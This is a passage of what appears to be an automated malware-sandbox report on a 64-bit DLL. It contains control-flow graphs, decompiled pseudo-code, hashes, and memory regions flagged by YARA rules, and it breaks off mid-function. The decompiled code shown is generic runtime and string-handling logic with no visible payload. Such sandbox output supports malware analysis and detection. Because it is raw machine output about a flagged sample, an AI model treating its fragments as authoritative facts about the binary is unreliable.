                                                                                                      control_flow_graph 635 1800248e0-1800248fd 636 180024904-180024909 635->636 637 1800250f3-1800250f8 636->637 638 18002490f 636->638 641 1800254ca-180025622 call 18002629c call 1800210bc call 180002094 637->641 642 1800250fe-180025103 637->642 639 180024f62-18002502d call 180001000 call 1800210bc 638->639 640 180024915-18002491a 638->640 677 180025032-1800250ee call 180002094 639->677 646 180024920-180024925 640->646 647 180024dce-180024eb5 call 180014fa4 call 1800210bc 640->647 658 180025627-18002562c 641->658 643 180025459-1800254c5 call 180009144 642->643 644 180025109-18002510e 642->644 643->636 650 180025114-180025119 644->650 651 1800252ad-180025379 call 18001cf30 call 1800210bc 644->651 654 180024c3b-180024d15 call 1800159a0 call 1800210bc 646->654 655 18002492b-180024930 646->655 679 180024eba-180024f5d call 180002094 647->679 650->658 659 18002511f-1800251ec call 18000b8d0 call 1800210bc 650->659 692 18002537e-180025454 call 180002094 651->692 693 180024d1a-180024dc9 call 180002094 654->693 662 180024ab3-180024b9b call 18001c1dc call 1800210bc 655->662 663 180024936-18002493b 655->663 673 180025632 658->673 674 1800257ad-1800257b3 658->674 696 1800251f1-1800252a8 call 180002094 659->696 698 180024ba0-180024c36 call 180002094 662->698 671 180024941-180024946 663->671 672 180025637-180025720 call 180008fa0 call 1800210bc 663->672 671->658 682 18002494c-180024aae call 180004ca0 call 1800210bc call 180002094 671->682 703 180025725-1800257a8 call 180002094 672->703 673->636 677->636 679->636 682->636 692->636 693->636 696->636 698->636 703->674
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Rl$X$kr$V%?
                                                                                                      • API String ID: 0-1881522904
                                                                                                      • Opcode ID: 98ff1e27a160c74632e307d872ef1a7f9803bcbde420e3daba4ce0dca79685d9
                                                                                                      • Instruction ID: 70c5aac2912e64376728126259cd49d2f789cf9a10fb17a3f2cb6be72cb14558
                                                                                                      • Opcode Fuzzy Hash: 98ff1e27a160c74632e307d872ef1a7f9803bcbde420e3daba4ce0dca79685d9
                                                                                                      • Instruction Fuzzy Hash: 59A2077051078D8FDB89CF24C88A5DE3BA0FB58398F52531DFC8AA6290D778D595CB88
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 715 1800038a5-1800038ad 716 1800038f3-1800038fb 715->716 717 1800038af-1800038d9 call 180015254 715->717 719 180003902-180003907 716->719 721 180003b71-180003bc4 call 180009144 719->721 722 18000390d-180003912 719->722 732 180003bc6-180003bcb 721->732 733 180003bd0 721->733 724 180003b01-180003b6c call 18001b7b0 722->724 725 180003918-18000391d 722->725 724->719 728 180003923-180003928 725->728 729 180003a56-180003afc call 180020364 725->729 734 180003bd5-180003bda 728->734 735 18000392e-1800039e8 call 180016fb4 728->735 729->719 732->719 733->734 738 180003a43-180003a55 734->738 739 180003be0 734->739 740 1800039ed-1800039f0 735->740 739->719 741 1800039f2-1800039f9 740->741 742 180003a03-180003a3e call 18001c4c0 740->742 741->742 742->738
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: +s$l@-T$pN$x+MS
                                                                                                      • API String ID: 0-3074933293
                                                                                                      • Opcode ID: 81be9b45353ead76c9a7b6c7e167c5c32a8ae5faee5dc8465e9a6d9c4c43a028
                                                                                                      • Instruction ID: e901c82c2c3415e94c79d9569d7d5064836046090d2f5b38374df02bf067750a
                                                                                                      • Opcode Fuzzy Hash: 81be9b45353ead76c9a7b6c7e167c5c32a8ae5faee5dc8465e9a6d9c4c43a028
                                                                                                      • Instruction Fuzzy Hash: A991597160074D8BEB59CF28C89A6DE3BA1FB58398F51422CFC4A97290CB78D655CBC4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: \$m[+$m)7
                                                                                                      • API String ID: 0-1435720626
                                                                                                      • Opcode ID: af10a5be19bd77cf0563b38453e590c7ca23ba3a925fd2c55e2086c6d71307a8
                                                                                                      • Instruction ID: 883ce2ee539239a1f536d03f946b290b5c9bffedac0f26b385fd5492cb17272a
                                                                                                      • Opcode Fuzzy Hash: af10a5be19bd77cf0563b38453e590c7ca23ba3a925fd2c55e2086c6d71307a8
                                                                                                      • Instruction Fuzzy Hash: C002F6715083C88BEBFADF64C8897DE7BACFB54708F104619EA0A9E298DB745744CB41
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: x+MS$8
                                                                                                      • API String ID: 0-2879286383
                                                                                                      • Opcode ID: 0b36e420fc5be994054ff9bd7cd914dceaa5a559053905e74aaceefae8f335f5
                                                                                                      • Instruction ID: 069f65542df350c22b25c5b11342d601f1728201a4aced1865a094658918a1cd
                                                                                                      • Opcode Fuzzy Hash: 0b36e420fc5be994054ff9bd7cd914dceaa5a559053905e74aaceefae8f335f5
                                                                                                      • Instruction Fuzzy Hash: 42413B7050074D8BEB49CF28C88A6DE3FA1FB18398F61421DFD4A96290D778D598CBC4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: '7$pr
                                                                                                      • API String ID: 0-1984906187
                                                                                                      • Opcode ID: 056c662d811a8c845d4963eb3dfda1ff298b6ec1510e4f1f57fedda2cc0e9922
                                                                                                      • Instruction ID: a51af08d5e019336a09e0604cbee0951de86a06f6bb7dc6101bcf2cec172da0b
                                                                                                      • Opcode Fuzzy Hash: 056c662d811a8c845d4963eb3dfda1ff298b6ec1510e4f1f57fedda2cc0e9922
                                                                                                      • Instruction Fuzzy Hash: A031C2B05187818BD358CFA8C48A51AFBF5BBC6344F104A1DF9C2866A0D7F5D946CB42
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: {6
                                                                                                      • API String ID: 0-1346941803
                                                                                                      • Opcode ID: 8506dbb6b1252c503813ed30af6b5c4e6b9b4570125e6fd192f6fa1e5665ff7b
                                                                                                      • Instruction ID: 4f9844d0cd30e9af067f9ce6bd73810c55f6bc83b648b6efbf776691940ba2a0
                                                                                                      • Opcode Fuzzy Hash: 8506dbb6b1252c503813ed30af6b5c4e6b9b4570125e6fd192f6fa1e5665ff7b
                                                                                                      • Instruction Fuzzy Hash: FA8126B09047098BDF48DFA8C4865EEBBF0FB48358F15821DE80AB7291D7789945CF98
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 1
                                                                                                      • API String ID: 0-4267224553
                                                                                                      • Opcode ID: 14ae2c29f1f0adff71999c81ec21c279a8b8cf5828faf7ab2494e8710ca5a4c5
                                                                                                      • Instruction ID: f864b420d3f879fa0c4a6b1c1884d968131e299f1c3c71a38cb5ded6753929e5
                                                                                                      • Opcode Fuzzy Hash: 14ae2c29f1f0adff71999c81ec21c279a8b8cf5828faf7ab2494e8710ca5a4c5
                                                                                                      • Instruction Fuzzy Hash: 4881FE705087848FD779DF28C59A6DEBBF1FB89704F004A1DEA8A8B260D7769905CB42
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 311 7ff87c104194-7ff87c10419a 312 7ff87c1041d5-7ff87c10432c 311->312 313 7ff87c10419c-7ff87c10419f 311->313 317 7ff87c104332-7ff87c10434d call 7ff87c103da8 312->317 318 7ff87c10432e-7ff87c104330 312->318 315 7ff87c1041a1-7ff87c1041a4 313->315 316 7ff87c1041c9-7ff87c104208 call 7ff87c103f18 313->316 320 7ff87c1041a6-7ff87c1041a9 315->320 321 7ff87c1041bc __scrt_dllmain_crt_thread_attach 315->321 334 7ff87c104211-7ff87c104226 call 7ff87c103da8 316->334 335 7ff87c10420a-7ff87c10420c 316->335 332 7ff87c10434f-7ff87c104354 call 7ff87c104944 317->332 333 7ff87c104359-7ff87c104380 call 7ff87c103ed4 call 7ff87c103f04 call 7ff87c1040cc call 7ff87c1040f0 317->333 325 7ff87c104382-7ff87c104391 318->325 322 7ff87c1041b5-7ff87c1041ba call 7ff87c103e58 320->322 323 7ff87c1041ab-7ff87c1041b4 320->323 324 7ff87c1041c1-7ff87c1041c8 321->324 322->324 332->333 333->325 343 7ff87c104232-7ff87c104243 call 7ff87c103e18 334->343 344 7ff87c104228-7ff87c10422d call 7ff87c104944 334->344 338 7ff87c1042f9-7ff87c10430e 335->338 351 7ff87c104245-7ff87c10427a call 7ff87c104b90 call 7ff87c10416c call 7ff87c104b40 call 7ff87c10416c call 7ff87c104b6c call 7ff87c10a908 343->351 352 7ff87c1042ac-7ff87c1042b6 call 7ff87c1040cc 343->352 344->343 378 7ff87c10427f-7ff87c104281 351->378 352->335 360 7ff87c1042bc-7ff87c1042c8 call 7ff87c104b88 352->360 366 7ff87c1042ee-7ff87c1042f4 360->366 367 7ff87c1042ca-7ff87c1042d4 call 7ff87c104030 360->367 366->338 367->366 373 7ff87c1042d6-7ff87c1042e9 call 7ff87c104a8c 367->373 373->366 378->352 379 7ff87c104283-7ff87c10428a __scrt_dllmain_after_initialize_c 378->379 379->352 380 7ff87c10428c-7ff87c1042a9 call 7ff87c10a8c4 379->380 380->352
                                                                                                      C-Code - Quality: 100%
                                                                                                      			E00007FF87FF87C104194(void* __edx) {
                                                                                                      				void* _t5;
                                                                                                      
                                                                                                      				_t5 = __edx;
                                                                                                      				if (_t5 == 0) goto 0x7c1041d5;
                                                                                                      				if (_t5 == 0) goto 0x7c1041c9;
                                                                                                      				if (_t5 == 0) goto 0x7c1041bc;
                                                                                                      				if (__edx == 1) goto 0x7c1041b5;
                                                                                                      				return 1;
                                                                                                      			}




                                                                                                      0x7ff87c104198
                                                                                                      0x7ff87c10419a
                                                                                                      0x7ff87c10419f
                                                                                                      0x7ff87c1041a4
                                                                                                      0x7ff87c1041a9
                                                                                                      0x7ff87c1041b4

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                                                                                                      • String ID:
                                                                                                      • API String ID: 3885183344-0
                                                                                                      • Opcode ID: ec243dcbcff698803e31ef63cfb55d7716ebdb7e47eb3b9e43d512bdeea0bc95
                                                                                                      • Instruction ID: 63c8cf4d44079a84753c7e26bb6bf7211eeb2c9769b4f01f4dc0b103ab13bc44
                                                                                                      • Opcode Fuzzy Hash: ec243dcbcff698803e31ef63cfb55d7716ebdb7e47eb3b9e43d512bdeea0bc95
                                                                                                      • Instruction Fuzzy Hash: A3514A23E3C64385FB14AB61E9813BA26A0BF573C4F884035EA6D47697DE2CE4C58730
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      C-Code - Quality: 45%
                                                                                                      			E00007FF87FF87C101580(long long __rcx, long long __rdx, long long _a8, void* _a16) {
                                                                                                      				char _v16;
                                                                                                      				char _v24;
                                                                                                      				long long _v32;
                                                                                                      				void* _v40;
                                                                                                      				long long _v48;
                                                                                                      				long long _v56;
                                                                                                      				void* _t41;
                                                                                                      				intOrPtr* _t49;
                                                                                                      				void* _t77;
                                                                                                      
                                                                                                      				_a16 = __rdx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				_v32 = 0xfffffffe;
                                                                                                      				_t49 = _a16;
                                                                                                      				if (_a8 == _t49) goto 0x7c101693;
                                                                                                      				r8d = 0;
                                                                                                      				E00007FF87FF87C101910(1, _t49, _a8, _t77); // executed
                                                                                                      				if (0 == 1) goto 0x7c10160a;
                                                                                                      				E00007FF87FF87C101850(_a16);
                                                                                                      				_v56 = _t49;
                                                                                                      				E00007FF87FF87C101850(_a8);
                                                                                                      				if ((E00007FF87FF87C102A50(_t49, _v56) & 0x000000ff) == 0) goto 0x7c10160a;
                                                                                                      				E00007FF87FF87C101850(_a16);
                                                                                                      				E00007FF87FF87C101870(_t49, _a8, _t49);
                                                                                                      				E00007FF87FF87C101850(_a16);
                                                                                                      				_v48 = _t49;
                                                                                                      				E00007FF87FF87C101850(_a8);
                                                                                                      				if ((E00007FF87FF87C102A50(_t49, _v48) & 0x000000ff) == 0) goto 0x7c10167a;
                                                                                                      				E00007FF87FF87C101A20(_t49, _a16,  &_v24);
                                                                                                      				_v40 = _t49;
                                                                                                      				E00007FF87FF87C101AA0(_t49, _a16,  &_v16);
                                                                                                      				_t41 = E00007FF87FF87C102A90(E00007FF87FF87C102A50(_t49, _v48) & 0x000000ff, _t49, _a8,  *_t49,  *_v40);
                                                                                                      				goto 0x7c101693;
                                                                                                      				E00007FF87FF87C102B00(_t41, _a16);
                                                                                                      				return E00007FF87FF87C101F00(_t49, _a8, _t49);
                                                                                                      			}












                                                                                                      0x7ff87c101580
                                                                                                      0x7ff87c101585
                                                                                                      0x7ff87c10158e
                                                                                                      0x7ff87c101597
                                                                                                      0x7ff87c1015a1
                                                                                                      0x7ff87c1015a7
                                                                                                      0x7ff87c1015b1
                                                                                                      0x7ff87c1015bc
                                                                                                      0x7ff87c1015c3
                                                                                                      0x7ff87c1015c9
                                                                                                      0x7ff87c1015d3
                                                                                                      0x7ff87c1015ef
                                                                                                      0x7ff87c1015f6
                                                                                                      0x7ff87c101604
                                                                                                      0x7ff87c10160f
                                                                                                      0x7ff87c101615
                                                                                                      0x7ff87c10161f
                                                                                                      0x7ff87c10163b
                                                                                                      0x7ff87c101647
                                                                                                      0x7ff87c10164d
                                                                                                      0x7ff87c10165c
                                                                                                      0x7ff87c101672
                                                                                                      0x7ff87c101678
                                                                                                      0x7ff87c10167f
                                                                                                      0x7ff87c10169c

                                                                                                      APIs
                                                                                                      • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C1015C3
                                                                                                      • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C1015D3
                                                                                                      • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C1015F6
                                                                                                        • Part of subcall function 00007FF87C101870: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C101883
                                                                                                      • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00007FF87C1015E4
                                                                                                        • Part of subcall function 00007FF87C102A50: type_info::_name_internal_method.LIBCMTD ref: 00007FF87C102A68
                                                                                                      • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C10160F
                                                                                                      • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C10161F
                                                                                                      • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00007FF87C101630
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$EmptyQueue::StructuredWork$Affinity::operator!=Hardware$type_info::_name_internal_method
                                                                                                      • String ID:
                                                                                                      • API String ID: 1937815552-0
                                                                                                      • Opcode ID: dc6ab4d9f45e2fc801d73a2ffc5ed4d45eff3d4dab762b5c041e478808ec6813
                                                                                                      • Instruction ID: a9581436a24e58de26ee5baf09c3c0adb15f62409edea51d922d924aa6db61bd
                                                                                                      • Opcode Fuzzy Hash: dc6ab4d9f45e2fc801d73a2ffc5ed4d45eff3d4dab762b5c041e478808ec6813
                                                                                                      • Instruction Fuzzy Hash: 6231213366DA4181DB10EB22E45157B6361FBC67C0F111536F9AD83BAADE2CE4C18B10
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      C-Code - Quality: 50%
                                                                                                      			E00007FF87FF87C102600(long long __rcx, signed int __rdx, long long __r8, long long _a8, signed int _a16, long long _a24) {
                                                                                                      				long long _v24;
                                                                                                      				long long _v32;
                                                                                                      				long long _v40;
                                                                                                      				void* _v64;
                                                                                                      				long long _v72;
                                                                                                      				long long _v80;
                                                                                                      				long long _v88;
                                                                                                      				long long _v96;
                                                                                                      				long long _v104;
                                                                                                      				char _v112;
                                                                                                      				signed long long _v120;
                                                                                                      				void* _t82;
                                                                                                      				signed long long _t111;
                                                                                                      				intOrPtr* _t113;
                                                                                                      				intOrPtr* _t114;
                                                                                                      				long long _t115;
                                                                                                      				intOrPtr* _t116;
                                                                                                      				intOrPtr* _t117;
                                                                                                      				signed long long _t118;
                                                                                                      				long long _t120;
                                                                                                      				long long* _t121;
                                                                                                      
                                                                                                      				_a24 = __r8;
                                                                                                      				_a16 = __rdx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				_v24 = 0xfffffffe;
                                                                                                      				_t111 = _a16 | 0x0000000f;
                                                                                                      				_v120 = _t111;
                                                                                                      				E00007FF87FF87C102830(_t111, _a8);
                                                                                                      				if (_t111 - _v120 >= 0) goto 0x7c102659;
                                                                                                      				_v120 = _a16;
                                                                                                      				goto 0x7c102736;
                                                                                                      				_t113 = _v120;
                                                                                                      				_v104 = _t113;
                                                                                                      				E00007FF87FF87C102150(_t113, _a8);
                                                                                                      				_t114 =  *_t113;
                                                                                                      				if (_t114 - _v104 > 0) goto 0x7c102696;
                                                                                                      				goto 0x7c102736;
                                                                                                      				E00007FF87FF87C102150(_t114, _a8);
                                                                                                      				_t115 =  *_t114;
                                                                                                      				_v96 = _t115;
                                                                                                      				E00007FF87FF87C102830(_t115, _a8);
                                                                                                      				_t116 = _t115 - _v96;
                                                                                                      				_v88 = _t116;
                                                                                                      				E00007FF87FF87C102150(_t116, _a8);
                                                                                                      				if ( *_t116 - _v88 > 0) goto 0x7c102724;
                                                                                                      				E00007FF87FF87C102150(_t116, _a8);
                                                                                                      				_t117 =  *_t116;
                                                                                                      				_v80 = _t117;
                                                                                                      				E00007FF87FF87C102150(_t117, _a8);
                                                                                                      				_t118 = _v80 +  *_t117;
                                                                                                      				_v120 = _t118;
                                                                                                      				goto 0x7c102736;
                                                                                                      				E00007FF87FF87C102830(_t118, _a8);
                                                                                                      				_v120 = _t118;
                                                                                                      				_t120 = _v120 + 1;
                                                                                                      				_v72 = _t120;
                                                                                                      				E00007FF87FF87C101850(_a8);
                                                                                                      				E00007FF87FF87C1028E0(_t120, _v72); // executed
                                                                                                      				_v64 = _t120;
                                                                                                      				_t121 = _v64;
                                                                                                      				_v112 = _t121;
                                                                                                      				goto 0x7c102771;
                                                                                                      				if (_a24 <= 0) goto 0x7c1027b0;
                                                                                                      				_t82 = E00007FF87FF87C1018F0(_t121, _a8);
                                                                                                      				_v40 = _t121;
                                                                                                      				E00007FF87FF87C102C00(_t82, _v112);
                                                                                                      				E00007FF87FF87C1011E0(_t121, _v40, _a24);
                                                                                                      				r8d = 0;
                                                                                                      				E00007FF87FF87C101910(1, _t121, _a8, _a24);
                                                                                                      				E00007FF87FF87C102BC0(E00007FF87FF87C102190(_a8), _t121);
                                                                                                      				_v32 = _t121;
                                                                                                      				E00007FF87FF87C101850(_a8);
                                                                                                      				E00007FF87FF87C102C10(_t121, _t121, _v32,  &_v112);
                                                                                                      				E00007FF87FF87C102150(_t121, _a8);
                                                                                                      				 *_t121 = _v120;
                                                                                                      				return E00007FF87FF87C1023A0(_t121, _a8, _a24);
                                                                                                      			}
























                                                                                                      0x7ff87c102600
                                                                                                      0x7ff87c102605
                                                                                                      0x7ff87c10260a
                                                                                                      0x7ff87c102616
                                                                                                      0x7ff87c10262a
                                                                                                      0x7ff87c10262e
                                                                                                      0x7ff87c10263b
                                                                                                      0x7ff87c102645
                                                                                                      0x7ff87c10264f
                                                                                                      0x7ff87c102654
                                                                                                      0x7ff87c10265b
                                                                                                      0x7ff87c102668
                                                                                                      0x7ff87c102675
                                                                                                      0x7ff87c10267c
                                                                                                      0x7ff87c10268f
                                                                                                      0x7ff87c102691
                                                                                                      0x7ff87c10269e
                                                                                                      0x7ff87c1026a5
                                                                                                      0x7ff87c1026b0
                                                                                                      0x7ff87c1026bd
                                                                                                      0x7ff87c1026c7
                                                                                                      0x7ff87c1026ca
                                                                                                      0x7ff87c1026d7
                                                                                                      0x7ff87c1026e4
                                                                                                      0x7ff87c1026ee
                                                                                                      0x7ff87c1026f5
                                                                                                      0x7ff87c102700
                                                                                                      0x7ff87c10270d
                                                                                                      0x7ff87c10271a
                                                                                                      0x7ff87c10271d
                                                                                                      0x7ff87c102722
                                                                                                      0x7ff87c10272c
                                                                                                      0x7ff87c102731
                                                                                                      0x7ff87c10273b
                                                                                                      0x7ff87c10273e
                                                                                                      0x7ff87c10274b
                                                                                                      0x7ff87c10275b
                                                                                                      0x7ff87c102760
                                                                                                      0x7ff87c102765
                                                                                                      0x7ff87c10276a
                                                                                                      0x7ff87c10276f
                                                                                                      0x7ff87c10277a
                                                                                                      0x7ff87c102784
                                                                                                      0x7ff87c102789
                                                                                                      0x7ff87c102793
                                                                                                      0x7ff87c1027ab
                                                                                                      0x7ff87c1027b0
                                                                                                      0x7ff87c1027bd
                                                                                                      0x7ff87c1027d2
                                                                                                      0x7ff87c1027d7
                                                                                                      0x7ff87c1027e4
                                                                                                      0x7ff87c1027f9
                                                                                                      0x7ff87c102806
                                                                                                      0x7ff87c102810
                                                                                                      0x7ff87c10282f

                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF87C102830: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C10283E
                                                                                                        • Part of subcall function 00007FF87C102830: Concurrency::details::SchedulerBase::ThrottlerDispatchBridge.LIBCMTD ref: 00007FF87C10284B
                                                                                                      • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C10274B
                                                                                                      • type_info::_name_internal_method.LIBCMTD ref: 00007FF87C10275B
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C102784
                                                                                                      • char_traits.LIBCPMTD ref: 00007FF87C1027AB
                                                                                                      • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C1027E4
                                                                                                      • construct.LIBCPMTD ref: 00007FF87C1027F9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$Work$EmptyQueue::Structured$Base::$BridgeContextDispatchIdentityQueueSchedulerThrottlerchar_traitsconstructtype_info::_name_internal_method
                                                                                                      • String ID:
                                                                                                      • API String ID: 3284725307-0
                                                                                                      • Opcode ID: d9377374bb8acdff986d08050f48ac2bf9a2668c8ad2a48d0c73f653525763d1
                                                                                                      • Instruction ID: adc8a36824eadd71f02102c790ca36482a1caa161b7001f99f69deea366e0896
                                                                                                      • Opcode Fuzzy Hash: d9377374bb8acdff986d08050f48ac2bf9a2668c8ad2a48d0c73f653525763d1
                                                                                                      • Instruction Fuzzy Hash: D851FD2262DB8585DB60DB51E4513AAB3A0FBCA7C0F504175EADD87B6ADF3CD4908B10
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      C-Code - Quality: 45%
                                                                                                      			E00007FF87FF87C101910(signed char __edx, intOrPtr* __rax, long long __rcx, long long __r8, long long _a8, signed char _a16, long long _a24) {
                                                                                                      				long long _v16;
                                                                                                      				long long _v24;
                                                                                                      				long long _v32;
                                                                                                      				long long _v40;
                                                                                                      				void* _t32;
                                                                                                      				intOrPtr* _t47;
                                                                                                      				long long* _t49;
                                                                                                      
                                                                                                      				_a24 = __r8;
                                                                                                      				_a16 = __edx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				if ((_a16 & 0x000000ff) != 0) goto 0x7c101930;
                                                                                                      				goto 0x7c1019f1;
                                                                                                      				E00007FF87FF87C102150(__rax, _a8);
                                                                                                      				if ( *((long long*)(__rax)) - 0x10 < 0) goto 0x7c1019f1;
                                                                                                      				E00007FF87FF87C102190(_a8);
                                                                                                      				_t47 =  *((intOrPtr*)(__rax));
                                                                                                      				_v40 = _t47;
                                                                                                      				E00007FF87FF87C102BC0(E00007FF87FF87C102190(_a8), _t47);
                                                                                                      				_v32 = _t47;
                                                                                                      				E00007FF87FF87C101850(_a8);
